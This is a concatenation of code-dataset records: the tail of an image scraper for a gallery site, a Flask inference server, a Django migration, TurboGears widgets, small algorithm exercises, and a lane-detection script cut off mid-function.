CNZZDATA3866066=cnzz_eid%3D376479854-1494676185-%26ntime%3D1494676185; Hm_lvt_9a737a8572f89206db6e9c301695b55a=1510220189; Hm_lpvt_9a737a8572f89206db6e9c301695b55a=1510220990',\n 'Host': 'img1.mm131.me',\n 'Pragma': 'no-cache',\n 'Referer': 'http://www.mm131.com/' + keyName + \"/\",\n 'User-Agent': getUserAgent()}\n # headers.update({'Cookie': 'UM_distinctid=15fa02251e679e-05c01fdf7965e7-5848211c-144000-15fa02251e7801; bdshare_firstime=1510220189357; CNZZDATA1263415983=1653134122-1510216223-null%7C1510216223; CNZZDATA3866066=cnzz_eid%3D376479854-1494676185-%26ntime%3D1494676185; Hm_lvt_9a737a8572f89206db6e9c301695b55a=1510220189; Hm_lpvt_9a737a8572f89206db6e9c301695b55a=1510220990'})\n pic = requests.get(imgUrl, headers=headers, timeout=10)\n # urllib.request.urlretrieve(imgUrl, path)\n fp = open(path, 'wb')\n fp.write(pic.content)\n fp.close()\n pic.close()\n print(keyName + '下的' + title + '中的第' + str(pageIndex + 1) + '张图片下载完成-->' + imgUrl)\n except requests.exceptions.ConnectionError:\n print(keyName + '下的' + title + '中的第' + str(pageIndex + 1) + '张图片下载【错误】------------')\n except requests.exceptions.ReadTimeout:\n print(keyName + '下的' + title + '中的第' + str(pageIndex + 1) + '张图片下载【超时】------------')\n except Exception as e:\n print(keyName + '下的' + title + '中的第' + str(pageIndex + 1) + '张图片下载【失败】------------')\n print(e)\n else:\n print('%s 已存在' % path)\n # time.sleep(0.15)\n\n\ndef getSingleImg(url):\n \"\"\"\n 下载单独套图\n :param url: 套图地址\n :return:\n \"\"\"\n key = 
str(url).split('/')[3]\n    print(key)\n    getDataByLink([url], key)\n\n\nif __name__ == '__main__':\n    args = sys.argv[1:]\n    if args:\n        numb = args[0]\n        getSingleImg('http://www.mm131.com/xinggan/'+numb+'.html')\n    else:\n        numb = input(\"Enter gallery id(s): \")\n        if numb:\n            numbs = numb.split(' ')\n            for n in numbs:\n                getSingleImg('http://www.mm131.com/xinggan/'+n+'.html')\n        else:\n            getDataByKey(key_names, 4)\n    # getSingleImg('http://www.mm131.com/xinggan/4168.html')\n    pass\n","sub_path":"spider/mm131.py","file_name":"mm131.py","file_ext":"py","file_size_in_byte":8023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"52370555","text":"import numpy as np\nimport config\nimport os\nimport torch\nimport cv2\nfrom PIL import Image\nfrom models.base_conv_net_model import BaseConvNet\nfrom util.inference_util import load_model, predict\nfrom flask import Flask\nfrom flask import request\nfrom flask import jsonify\n\napp = Flask(__name__)\n\nMODEL = None  # loaded in __main__ before the server starts\nIDX_TO_CLASS = None\nCLASS_TO_IDX = None\nDevice = config.INFERENCE_DEVICE\n\n@app.route(\"/\")\ndef welcome():\n    return \"hello\"\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef do_prediction():\n    image_path = request.files['image']\n\n    image = Image.open(image_path.stream)\n    opencvImage = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)\n    if opencvImage is None : \n        response_data = {\n            \"message\" : \"Provide valid image path\"\n        }\n        status_code = 400\n    else:\n        prediction = predict(MODEL, image, IDX_TO_CLASS, height=config.IMAGE_SIZE[0], width=config.IMAGE_SIZE[1])\n        response_data = {\n            \"message\" : prediction\n        }\n        status_code = 200\n    return jsonify(response_data), status_code\n\nif __name__ == \"__main__\":\n\n    current_model_weight_path = os.path.join(config.MODEL_PATH, config.MODEL_NAME)\n    check_point_path = os.path.join(current_model_weight_path, config.CHECKPOINT_NAME)\n    check_point = torch.load(check_point_path, map_location = torch.device(config.INFERENCE_DEVICE))\n    model = BaseConvNet(num_classes=config.NUM_OF_CLASSES)\n    MODEL = load_model(model, check_point[\"state_dict\"])\n    CLASS_TO_IDX = check_point[\"class_to_idx\"]\n    IDX_TO_CLASS = check_point['idx_to_class']\n\n    app.run(host='0.0.0.0', port=5000)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"574252739","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('notebook', '0004_auto_20150925_2309'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='phone',\n            name='contact',\n            field=models.ForeignKey(related_name='phones', to='notebook.Contact'),\n        ),\n    ]\n","sub_path":"notebook/migrations/0005_auto_20150927_0215.py","file_name":"0005_auto_20150927_0215.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"642193214","text":"\"\"\"The bigger TurboGears widgets\"\"\"\n\n__all__ = ['CalendarDatePicker', 'CalendarDateTimePicker',\n           'AutoCompleteField', 'AutoCompleteTextField',\n           'LinkRemoteFunction', 'RemoteForm', 'AjaxGrid', 'URLLink']\n\nimport itertools\nfrom datetime import datetime\n\nfrom turbogears import validators, expose\nfrom turbojson import jsonify\nfrom turbogears.widgets.base import (CSSLink, JSLink, CSSSource, JSSource,\n    Widget, WidgetsList, static, mochikit, 
CoreWD)\nfrom turbogears.widgets.i18n import CalendarLangFileLink\nfrom turbogears.widgets.forms import (FormField, CompoundFormField, TextField,\n HiddenField, TableForm, CheckBox, RadioButtonList)\nfrom turbogears.widgets.rpc import RPC\n\n\nclass CalendarDatePicker(FormField):\n \"\"\"Use a Javascript calendar system to allow picking of calendar dates.\"\"\"\n\n template = \"\"\"\n \n \n \n \n \n \"\"\"\n params = ['attrs', 'skin', 'picker_shows_time', 'button_text',\n 'format', 'calendar_lang']\n params_doc = {\n 'attrs': 'Extra attributes',\n 'skin': 'For alternate skins, such as \"calendar-blue\" or \"skins/aqua/theme\"',\n 'picker_shows_time': 'Whether the calendar should let you pick a time, too',\n 'button_text': 'Text for the button that will show the calendar picker',\n 'format': 'The date format (default is mm/dd/yyyy)',\n 'calendar_lang': 'The language to be used in the calendar picker.'\n }\n attrs = {}\n skin = 'calendar-system'\n picker_shows_time = False\n button_text = 'Choose'\n format = '%m/%d/%Y'\n calendar_lang = None\n _default = None\n\n def __init__(self, name=None, default=None, not_empty=True,\n calendar_lang=None, validator=None, format=None, **kw):\n super(CalendarDatePicker, self).__init__(name, **kw)\n self.not_empty = not_empty\n if default is not None or not self.not_empty:\n self._default = default\n if format is not None:\n self.format = format\n if validator is None:\n self.validator = validators.DateTimeConverter(\n format=self.format, not_empty=self.not_empty)\n else:\n self.validator = validator\n if calendar_lang:\n self.calendar_lang = calendar_lang\n javascript = [JSLink(static, 'calendar/calendar.js'),\n JSLink(static, 'calendar/calendar-setup.js')]\n javascript.append(CalendarLangFileLink(static,\n language=self.calendar_lang))\n self.javascript = self.javascript + javascript\n if self.skin:\n css = [CSSLink(static, 'calendar/%s.css' % self.skin)]\n self.css = self.css + css\n\n @property\n def default(self):\n if self._default is None and self.not_empty:\n return datetime.now()\n return self._default\n\n def update_params(self, d):\n super(CalendarDatePicker, self).update_params(d)\n if hasattr(d['value'], 'strftime'):\n d['strdate'] = d['value'].strftime(d['format'])\n else:\n d['strdate'] = d['value']\n\n\nclass CalendarDatePickerDesc(CoreWD):\n\n name = \"Calendar\"\n for_widget = CalendarDatePicker('date_picker')\n\n\nclass CalendarDateTimePicker(CalendarDatePicker):\n \"\"\"Javascript calendar system to allow picking of dates with times.\"\"\"\n\n format = '%Y/%m/%d %H:%M'\n picker_shows_time = True\n\n\nclass CalendarDateTimePickerDesc(CoreWD):\n\n name = \"Calendar with time\"\n for_widget = CalendarDateTimePicker(\"datetime_picker\")\n\n\nclass AutoComplete(Widget):\n \"\"\"Mixin class for autocomplete fields.\n\n Performs Ajax-style autocompletion by requesting search\n results from the server as the user types.\n\n \"\"\"\n\n javascript = [mochikit, JSLink(static,\"autocompletefield.js\")]\n css = [CSSLink(static,\"autocompletefield.css\")]\n params = ['search_controller', 'search_param', 'result_name', 'attrs',\n 'only_suggest', 'complete_delay', 'take_focus', 'min_chars', 'show_spinner']\n params_doc = {\n 'attrs': 'Extra attributes',\n 'search_controller': 'Name of the controller returning the auto completions',\n 'search_param': 'Name of the search parameter (\"*\" passes all form fields)',\n 'result_name': 'Name of the result list returned by the controller',\n 'only_suggest': 'If true, pressing enter does not automatically submit 
the first list item.',\n 'complete_delay': 'Delay (in seconds) before loading new auto completions',\n 'take_focus': 'If true, take focus on load.',\n 'min_chars': 'Minimum number of characters to type before autocomplete activates',\n 'show_spinner': 'If false, the spinner (load indicator) is not shown.'\n }\n attrs = {}\n search_controller = ''\n search_param = 'searchString'\n result_name = 'textItems'\n only_suggest = False\n complete_delay = 0.200\n take_focus = False\n min_chars = 1\n show_spinner = True\n\n\nclass AutoCompleteField(CompoundFormField, AutoComplete):\n \"\"\"Text field with auto complete functionality and hidden key field.\"\"\"\n\n template = \"\"\"\n \n \n ${text_field.display(value_for(text_field), **params_for(text_field))}\n \"\"/\n \n ${hidden_field.display(value_for(hidden_field), **params_for(hidden_field))}\n \n \"\"\"\n member_widgets = ['text_field', 'hidden_field']\n text_field = TextField(name='text')\n hidden_field = HiddenField(name='hidden')\n\n\nclass AutoCompleteFieldDesc(CoreWD):\n\n name = \"AutoCompleteField\"\n codes = \"\"\"AK AL AR AS AZ CA CO CT DC DE FL FM GA GU HI IA ID IL IN KS\n KY LA MA MD ME MH MI MN MO MP MS MT NC ND NE NH NJ NM NV NY OH\n OK OR PA PR PW RI SC SD TN TX UM UT VA VI VT WA WI WV WY\"\"\".split()\n states = \"\"\"Alaska Alabama Arkansas American_Samoa Arizona\n California Colorado Connecticut District_of_Columbia\n Delaware Florida Federated_States_of_Micronesia Georgia Guam\n Hawaii Iowa Idaho Illinois Indiana Kansas Kentucky Louisiana\n Massachusetts Maryland Maine Marshall_Islands Michigan\n Minnesota Missouri Northern_Mariana_Islands Mississippi\n Montana North_Carolina North_Dakota Nebraska New_Hampshire\n New_Jersey New_Mexico Nevada New_York Ohio Oklahoma Oregon\n Pennsylvania Puerto_Rico Palau Rhode_Island South_Carolina\n South_Dakota Tennessee Texas U.S._Minor_Outlying_Islands\n Utah Virginia Virgin_Islands_of_the_U.S. Vermont Washington\n Wisconsin West_Virginia Wyoming\"\"\".split()\n states = map(lambda s: s.replace('_', ' '), states)\n state_code = dict(zip(codes, states))\n template = \"\"\"\n
    \n \n
    State\n
    \n \"\"\"\n full_class_name = \"turbogears.widgets.AutoCompleteField\"\n\n def __init__(self, *args, **kw):\n super(AutoCompleteFieldDesc, self).__init__(*args, **kw)\n self.for_widget = AutoCompleteField(name='state_and_code',\n search_controller='%s/search' % self.full_class_name,\n search_param='state', result_name='states')\n\n @expose('json')\n def search(self, state):\n states = []\n code = state.upper()\n if code in self.state_code:\n states.append((self.state_code[code], code))\n else:\n states.extend([s for s in zip(self.states, self.codes)\n if s[0].lower().startswith(state.lower())])\n return dict(states=states)\n\n\nclass AutoCompleteTextField(TextField, AutoComplete):\n \"\"\"Text field with auto complete functionality.\"\"\"\n\n template = \"\"\"\n \n \n \n \"\"/\n \n \n \"\"\"\n\n\nclass AutoCompleteTextFieldDesc(CoreWD):\n\n name = \"AutoCompleteTextField\"\n states = AutoCompleteFieldDesc.states\n state_code = AutoCompleteFieldDesc.state_code\n template = \"\"\"\n \n \n
    State
    \n \"\"\"\n full_class_name = \"turbogears.widgets.AutoCompleteTextField\"\n\n def __init__(self, *args, **kw):\n super(AutoCompleteTextFieldDesc, self).__init__(*args, **kw)\n self.for_widget = AutoCompleteTextField(name=\"state_only\",\n search_controller='%s/search' % self.full_class_name,\n search_param='state', result_name='states')\n\n @expose('json')\n def search(self, state):\n states = []\n code = state.upper()\n if code in self.state_code:\n states.append(self.state_code[code])\n else:\n states.extend([s for s in self.states\n if s.lower().startswith(state.lower())])\n return dict(states=states)\n\n\nclass LinkRemoteFunction(RPC):\n \"\"\"Link with remote execution.\n\n Returns a link that executes a POST asynchronously\n and updates a DOM Object with the result of it.\n\n \"\"\"\n\n template = \"\"\"\n \n \"\"\"\n\n params = ['attrs']\n attrs = {}\n\n\nclass LinkRemoteFunctionDesc(CoreWD):\n\n name = \"AJAX remote function\"\n states = AutoCompleteFieldDesc.states\n template = \"\"\"\n
    \n ${for_widget.display(\"States starting with the letter 'N'\", update=\"items\")}\n
    \n \"\"\"\n full_class_name = 'turbogears.widgets.LinkRemoteFunction'\n\n def __init__(self, *args, **kw):\n super(LinkRemoteFunctionDesc, self).__init__(*args, **kw)\n self.for_widget = LinkRemoteFunction(\n name='linkrf', action='%s/search_linkrf' % self.full_class_name,\n data=dict(state_starts_with='N'))\n\n @expose()\n def search_linkrf(self, state_starts_with):\n return '
    '.join(\n [s for s in self.states if s.startswith(state_starts_with)])\n\n\nclass RemoteForm(RPC, TableForm):\n \"\"\"AJAX table form.\n\n A TableForm that submits the data asynchronously and loads the resulting\n HTML into a DOM object\n\n \"\"\"\n\n def update_params(self, d):\n super(RemoteForm, self).update_params(d)\n d['form_attrs']['onSubmit'] = \"return !remoteFormRequest(this, '%s', %s);\" % (\n d.get('update', ''), jsonify.encode(self.get_options(d)))\n\n\nclass RemoteFormDesc(CoreWD):\n\n name = \"AJAX Form\"\n template = \"\"\"\n
    \n ${for_widget.display()}\n
     
    \n
    \n \"\"\"\n full_class_name = 'turbogears.widgets.RemoteForm'\n\n class TestFormFields(WidgetsList):\n name = TextField()\n age = TextField()\n check = CheckBox()\n radio = RadioButtonList(options=list(enumerate(\n \"Python Java Pascal Ruby\".split())), default=3)\n\n def __init__(self, *args, **kw):\n super(RemoteFormDesc, self).__init__(*args, **kw)\n self.for_widget = RemoteForm(\n fields=self.TestFormFields(),\n name='remote_form',\n update='post_data',\n action='%s/post_data_rf' % self.full_class_name,\n before=\"alert('pre-hook')\",\n confirm=\"Confirm?\",\n )\n\n @expose()\n def post_data_rf(self, **kw):\n return \"\"\"Received data:
    %r\"\"\" % kw\n\n\najaxgridcounter = itertools.count()\n\nclass AjaxGrid(Widget):\n \"\"\"AJAX updateable datagrid based on widget.js grid\"\"\"\n\n template = \"\"\"
    \n \n ${refresh_text}\n \n
    \n \n
    \n    \"\"\"\n    params = ['refresh_text', 'id', 'defaults']\n    defaults = {}\n    refresh_text = \"Update\"\n    id = 'ajaxgrid_%d' % ajaxgridcounter.next()\n\n    def __init__(self, refresh_url, *args, **kw):\n        super(AjaxGrid, self).__init__(*args, **kw)\n        target = '%s_update' % self.id\n        self.javascript = [\n            mochikit,\n            JSLink('turbogears', 'js/widget.js'),\n            JSLink(static, 'ajaxgrid.js'),\n            JSSource(\"\"\"\n                %(id)s_AjaxGrid = new AjaxGrid('%(refresh_url)s', '%(target)s');\n                \"\"\" % dict(id=self.id, refresh_url=refresh_url, target=target)\n            ),\n        ]\n\n    def update_params(self, d):\n        super(AjaxGrid, self).update_params(d)\n        d['defaults'] = jsonify.encode(d['defaults'])\n\n\nclass AjaxGridDesc(CoreWD):\n\n    name = \"AJAX Grid\"\n    full_class_name = 'turbogears.widgets.AjaxGrid'\n\n    @staticmethod\n    def facgen(n):\n        total = 1\n        yield 0, 1\n        for k in xrange(1, n+1):\n            total *= k\n            yield k, total\n\n\n    def __init__(self, *args, **kw):\n        super(AjaxGridDesc, self).__init__(*args, **kw)\n        self.for_widget = AjaxGrid(\n            refresh_url = \"%s/update\" % self.full_class_name,\n            # Dummy default params, just POC\n            defaults = dict(),\n        )\n        self.update_count = itertools.count()\n\n    @expose('json')\n    def update(self):\n        return dict(\n            headers = ['N', 'fact(N)'],\n            rows = list(self.facgen(self.update_count.next())),\n        )\n\n\nclass URLLink(FormField):\n    \"\"\"Hyperlink\"\"\"\n\n    template = \"\"\"\n    $text\n    \"\"\"\n    params = ['target', 'text', 'link', 'attrs']\n    attrs = {}\n    params_doc = {'link': 'Hyperlink',\n                  'target': 'Specify where the link should be opened',\n                  'text': 'The message to be shown for the link',\n                  'attrs': 'Extra attributes'}\n","sub_path":"horizon-new/virtualenv/lib/python2.6/site-packages/turbogears/widgets/big_widgets.py","file_name":"big_widgets.py","file_ext":"py","file_size_in_byte":16194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525043647","text":"#coding=utf-8\r\n# Dijkstra's algorithm\r\n# Example: trading sheet music (yuepu) up for a piano (gangqin)\r\ngraph={}\r\ngraph[\"yuepu\"]={}\r\ngraph[\"yuepu\"][\"changpian\"]=5\r\ngraph[\"yuepu\"][\"haibao\"]=0\r\ngraph[\"changpian\"]={}\r\ngraph[\"changpian\"][\"jita\"]=15\r\ngraph[\"changpian\"][\"jiazigu\"]=20\r\ngraph[\"haibao\"]={}\r\ngraph[\"haibao\"][\"jita\"]=30\r\ngraph[\"haibao\"][\"jiazigu\"]=35\r\ngraph[\"jita\"]={}\r\ngraph[\"jita\"][\"gangqin\"]=20\r\ngraph[\"jiazigu\"]={}\r\ngraph[\"jiazigu\"][\"gangqin\"]=10\r\ngraph[\"gangqin\"]={}\r\ninfinity=float(\"inf\")\r\ncosts={}\r\ncosts[\"changpian\"]=5\r\ncosts[\"haibao\"]=0\r\ncosts[\"jita\"]=infinity\r\ncosts[\"jiazigu\"]=infinity\r\ncosts[\"gangqin\"]=infinity\r\nparents={}\r\nparents[\"changpian\"]=\"yuepu\"\r\nparents[\"haibao\"]=\"yuepu\"\r\nparents[\"jita\"]=\"None\"\r\nparents[\"jiazigu\"]=\"None\"\r\nparents[\"gangqin\"]=\"None\"\r\nprocessed=[]\r\n\r\ndef find_low_cost_node(costs):\r\n    low_cost = float(\"inf\")\r\n    low_node = None\r\n    for node in costs:\r\n        cost = costs[node]\r\n        if(cost < low_cost and node not in processed):\r\n            low_cost = cost\r\n            low_node = node\r\n    return low_node\r\n\r\nnode = find_low_cost_node(costs)\r\nwhile node is not None:\r\n    cost = costs[node]\r\n    for n in graph[node]:\r\n        new_cost = cost + graph[node][n]\r\n        if(costs[n] > new_cost):\r\n            costs[n] = new_cost\r\n            parents[n] = node\r\n    processed.append(node)\r\n    node = find_low_cost_node(costs)\r\n\r\n\r\ndef get_course(sign):\r\n    if(sign != \"yuepu\"):\r\n        return get_course(parents[sign]) + \" --> \" + sign\r\n    else:\r\n        return sign\r\nprint(get_course(\"gangqin\"))\r\n","sub_path":"168206221/狄克斯特拉算法.py","file_name":"狄克斯特拉算法.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"415094340","text":"cont = int(input())\n\nwhile cont != 0:\n\n    num = int(input())\n    div = 2\n    primo = True\n\n    
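# A number greater than 1 is prime when it has no divisor up to its square\n    # root, so the trial division below only runs while div <= sqrt(num).\n    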
while primo and div <= num ** 0.5:\n if num % div == 0:\n primo = False\n div += 1\n if primo:\n print(\"%i eh primo\" % num)\n else:\n print(\"%i nao eh primo\" % num)\n\n cont -= 1\n","sub_path":"iniciante/1165 - Número Primo.py","file_name":"1165 - Número Primo.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"544911465","text":"# Filename: Program10-01.py\r\n# Author: N. Anim\r\n# Date: Apr. 25, 2016\r\n# Purpose: To demonstrate how to create a file object,\r\n# open a file, write to a file, and close a file.\r\n# This script is based on the algorithm in Figure 10-4.\r\n\r\n# Create a file object and open a file named \"philosophers.txt\"\r\noutfile = open(\"philosophers.txt\", 'w')\r\n\r\n# Write the names of some philosophers to the file\r\noutfile.write('Aristotle\\n')\r\noutfile.write('Plato\\n')\r\noutfile.write('Locke\\n')\r\noutfile.write('Hume\\n')\r\noutfile.write('Kirkgaard\\n')\r\n\r\n# Close the file\r\noutfile.close()\r\n","sub_path":"Programs/Program10-01.py","file_name":"Program10-01.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"611773275","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\nimport os\nimport pickle\nfrom moviepy.editor import VideoFileClip\nfrom tqdm import tqdm\n\n#-----------------------------------------------------------------------#\n# Define a class to receive the characteristics of each line detection\n#-----------------------------------------------------------------------#\nclass Line():\n def __init__(self):\n self.detected = False # was the line detected in the last iteration?\n self.recent_xfitted = [] # x values of the last n fits of the line\n self.bestx = None #average x values of the fitted line over the last n iterations\n self.best_fit = None #polynomial coefficients averaged over the last n iterations\n self.current_fit = [np.array([False])] #polynomial coefficients for the most recent fit\n self.radius_of_curvature = None #radius of curvature of the line in some units\n self.line_base_pos = None #distance in meters of vehicle center from the line\n self.diffs = np.array([0,0,0], dtype='float') #difference in fit coefficients between last and new fits\n self.allx = None #x values for detected line pixels\n self.ally = None #y values for detected line pixels\n\n#-----------------------------------------------------------------------#\n# Calibrate Camera using Sample Images provided and store it in a Pickle\n# file. 
If there is a pickle file exists already, then read that file\n# and return the Camera Matrix (mtx) and Distortion Coefficients (dist)\n#-----------------------------------------------------------------------#\ndef calibrateCameraBySamples(samples_folder, file_name_pattern, nx, ny, pickle_file_name='cam_calib_mtx_dist.p', save_calibration=True):\n mtx, dist = None, None\n pickle_file_path_name = None\n if (pickle_file_name is not None):\n pickle_file_path_name = os.path.join(samples_folder, pickle_file_name)\n \n if os.path.isfile(pickle_file_path_name):\n # Read in the saved camera matrix and distortion coefficients\n print('Reading calibration from pickle file', pickle_file_path_name)\n dist_pickle = pickle.load( open( pickle_file_path_name, \"rb\" ) )\n mtx = dist_pickle[\"mtx\"]\n dist = dist_pickle[\"dist\"]\n else:\n print('Generating calibration from sample images in ', samples_folder)\n objp = np.zeros((nx * ny, 3), np.float32)\n objp[:, :2] = np.mgrid[0:nx, 0:ny].T.reshape(-1, 2)\n \n objpoints = []\n imgpoints = []\n img_size = None\n \n fnames = os.path.join(samples_folder, file_name_pattern)\n print(fnames)\n images = glob.glob(fnames)\n for idx, fname in tqdm(enumerate(images)):\n img = mpimg.imread(fname)\n if img_size == None:\n img_size = img.shape[0:2]\n print('img_size = ', img_size)\n ret, corners = cv2.findChessboardCorners(img, (nx,ny))\n #print(idx, fname, ret)\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n \n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size, None, None)\n if save_calibration == True:\n dist_pickle = {}\n dist_pickle['mtx'] = mtx\n dist_pickle['dist'] = dist\n print('Storing mtx and dist values in', pickle_file_path_name)\n pickle.dump( dist_pickle, open( pickle_file_path_name, \"wb\" ) )\n \n return mtx, dist\n\n#-----------------------------------------------------------------------#\n# Verify the Camera Matrix (mtx) and Distortion Coefficients (dist) by\n# Undistorting a sample image. 
Compare the original and undistorted\n# images by plotting them side by side\n#-----------------------------------------------------------------------#\ndef testUndistor(img_file_name, mtx, dist):\n img = mpimg.imread(img_file_name)\n dst = cv2.undistort(img, mtx, dist, None, mtx)\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))\n f.tight_layout()\n ax1.grid(True)\n ax1.imshow(img)\n ax1.set_title('Original Image', fontsize=20)\n ax2.grid(True)\n ax2.imshow(dst)\n ax2.set_title('UnDistorted Image', fontsize=20)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show() \n\n#-----------------------------------------------------------------------#\n# Function that gives out the src and dst coordinates array to use for \n# warp transformations.\n#-----------------------------------------------------------------------#\ndef getTransformationPoints(img):\n s_tl, d_tl = [500, 510], [227, 333] #top left\n s_tr, d_tr = [790, 510], [1067, 333] #top right\n s_br, d_br = [1012, 647], [1067, 646] #bottom left\n s_bl, d_bl = [306, 647], [227, 646] #bottom right\n\n src = np.float32([ s_tl, s_tr, s_br, s_bl ])\n dst = np.float32([ d_tl, d_tr, d_br, d_bl ])\n# print('src', src)\n# print('dst', dst)\n return src, dst\n\n#-----------------------------------------------------------------------#\n# A function that provides the Transformation matrix & Inverse \n# Transformation for the given src & dst coordinates\n#-----------------------------------------------------------------------#\ndef getTransformationMatrices(src, dst):\n M = cv2.getPerspectiveTransform(src, dst)\n Minv = cv2.getPerspectiveTransform(dst, src)\n return M, Minv\n\n#-----------------------------------------------------------------------#\n# A convenience function to view 3 images in a row\n#-----------------------------------------------------------------------#\ndef visualize3Images(img1, img2, img3):\n f, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(24, 9))\n f.tight_layout()\n ax1.grid(True)\n ax1.imshow(img1)\n ax1.set_title('Original Image', fontsize=20)\n ax2.grid(True)\n ax2.imshow(img2)\n ax2.set_title('Warped Image', fontsize=20)\n ax3.grid(True)\n ax3.imshow(img3, cmap='gray')\n ax3.set_title('Thresholded Binary Image', fontsize=20)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show() \n\n#-----------------------------------------------------------------------#\n# A convenience function to view 2 images in a row\n#-----------------------------------------------------------------------#\ndef visualize2Images(img1, img2):\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))\n f.tight_layout()\n ax1.grid(True)\n ax1.imshow(img1)\n ax1.set_title('Oringal Image', fontsize=20)\n ax2.grid(True)\n ax2.imshow(img2, cmap='gray')\n ax2.set_title('Thresholded Color Binary', fontsize=20)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show()\n\n#-----------------------------------------------------------------------#\n# A convenience function to view one images & a graph plot in a row\n#-----------------------------------------------------------------------#\ndef visualizeImageGraph(img1, grph):\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))\n f.tight_layout()\n ax1.grid(True)\n ax1.imshow(img1, cmap='gray')\n ax1.set_title('Warped Threshold Binary', fontsize=20)\n ax2.grid(True)\n ax2.plot(grph)\n ax2.set_title('Histogram', fontsize=20)\n plt.xlim(0, 1280)\n plt.ylim(0, 250)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show() 
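\n# (editor note) Hypothetical usage sketch, not part of the original file: the\n# three threshold helpers defined below are commonly combined into one binary\n# mask before the perspective warp, for example:\n#   gradx = abs_sobel_thresh(img, orient='x', thresh=(20, 100))\n#   mag_bin = mag_thresh(img, sobel_kernel=9, mag_thresh=(30, 100))\n#   dir_bin = dir_threshold(img, sobel_kernel=15, dir_thresh=(0.7, 1.3))\n#   combined = np.zeros_like(gradx)\n#   combined[(gradx == 1) | ((mag_bin == 1) & (dir_bin == 1))] = 1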
\n\n#-----------------------------------------------------------------------#\n# Function to apply Sobel operator for the given orientation & kernal\n# and to threshold Sobel derivatives for the given range\n#-----------------------------------------------------------------------#\ndef abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):\n gray = img\n if (len(img.shape) == 3 and img.shape[2] > 2):\n print('abs_sobel_thresh - converting to gray')\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, (1 if orient == 'x' else 0), (1 if orient == 'y' else 0))\n abs_sobelx = np.absolute(sobelx)\n scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))\n binary_output = np.zeros_like(scaled_sobel)\n binary_output[(scaled_sobel >= thresh[0]) & (scaled_sobel <= thresh[1])] = 1\n return binary_output\n\n#-----------------------------------------------------------------------#\n# Function to arrive at the Magniture threshold for the given image & \n# threshold range\n#-----------------------------------------------------------------------#\ndef mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):\n gray = img\n if (len(img.shape) == 3 and img.shape[2] > 2):\n print('mag_thresh - converting to gray')\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1,0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0,1, ksize=sobel_kernel)\n abs_sobelxy = np.sqrt(np.square(sobelx) + np.square(sobely))\n scaled_sobelxy = np.uint8( 255*abs_sobelxy/np.max(abs_sobelxy) )\n binary_output = np.zeros_like(scaled_sobelxy)\n binary_output[(scaled_sobelxy >= mag_thresh[0]) & (scaled_sobelxy<= mag_thresh[1])] = 1\n return binary_output\n \n#-----------------------------------------------------------------------#\n# Function to arrive at the Directional threshold for the given image & \n# threshold range\n#-----------------------------------------------------------------------#\ndef dir_threshold(img, sobel_kernel=3, dir_thresh=(0, np.pi/2)):\n gray = img\n if (len(img.shape) == 3 and img.shape[2] > 2):\n print('dir_threshold - converting to gray')\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1,0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0,1, ksize=sobel_kernel)\n abs_sobelx = np.absolute(sobelx)\n abs_sobely = np.absolute(sobely)\n #abs_sobelxy = np.sqrt(sobelx**2 + sobely**2)\n arc_sobel = np.arctan2(abs_sobely, abs_sobelx)\n binary_output = np.zeros_like(arc_sobel)\n binary_output[(arc_sobel>=dir_thresh[0]) & (arc_sobel<=dir_thresh[1])] = 1\n #print(arc_sobel[200:420, 0:200])\n return binary_output\n\n#-----------------------------------------------------------------------#\n# Function to verify the current radius of curvature with the previous \n# frame's Radius of curvature and return the suitable polyfit values\n#-----------------------------------------------------------------------#\ndef lineCheck(line, curverad, fitx, fit):\n # line check for the lane\n if line.detected: # If lane is detected\n # If sanity check passes\n if abs(curverad / line.radius_of_curvature - 1) < .6: \n print('line.detected is true and roc ratio is < 0.6') \n line.detected = True\n line.current_fit = fit\n line.allx = fitx\n line.bestx = np.mean(fitx) \n line.radius_of_curvature = curverad\n # If sanity check 